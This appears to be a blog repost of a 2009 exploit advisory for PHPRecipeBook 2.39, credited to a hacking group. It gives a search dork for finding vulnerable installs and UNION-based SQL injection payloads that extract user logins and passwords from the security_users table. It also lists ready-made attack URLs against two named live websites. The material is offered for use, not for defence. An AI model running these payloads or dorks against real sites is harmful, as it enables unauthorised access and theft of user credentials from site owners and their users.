Download PHPRecipeBook: http://phprecipebook.sourceforge.net/
spl0itz: http://www.milw0rm.com/exploits/8330
//////////////////////////////////////////////////////////////////////
////////////////////////////1923TURK – GRUP///////////////////////////
//////////////////////////////////////////////////////////////////////
*****************************************************
[!] Script : PHPRecipeBook
[!] Verison : 2.39
[!] Download : http://sourceforge.net/projects/phprecipebook/[-] Bugs : Remote SQL injection Exploit
[-] Dork : inurl:”/index.php?m=” “PHPRecipeBook 2.39″
[-] Date : 31-03-09(19:33)
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[-] Contact : darkdewil@1923turk.biz[!] Note : Always use the time you have to finish your work.
Never leave it to the last minute.
Once time goes away, it never comes back*****************************************************
//////////////////////////////////////////////////////////////////////
*****************************************************
[-- Bugs --](+)
/index.php?m=recipes&a=search&search=yes&course_id=[SQLEXP]
[-- SQL EXPLOIT --]
Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users–
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users–# milw0rm.com [2009-03-31]
Ecco due siti vulnerabili:
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (nomi utenti)
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (password utenti)
—
http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (nomi utenti)
http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+security_users– (password utenti)
Etichette: exploits, PHPRecipeBook, SQLi, wepappsec
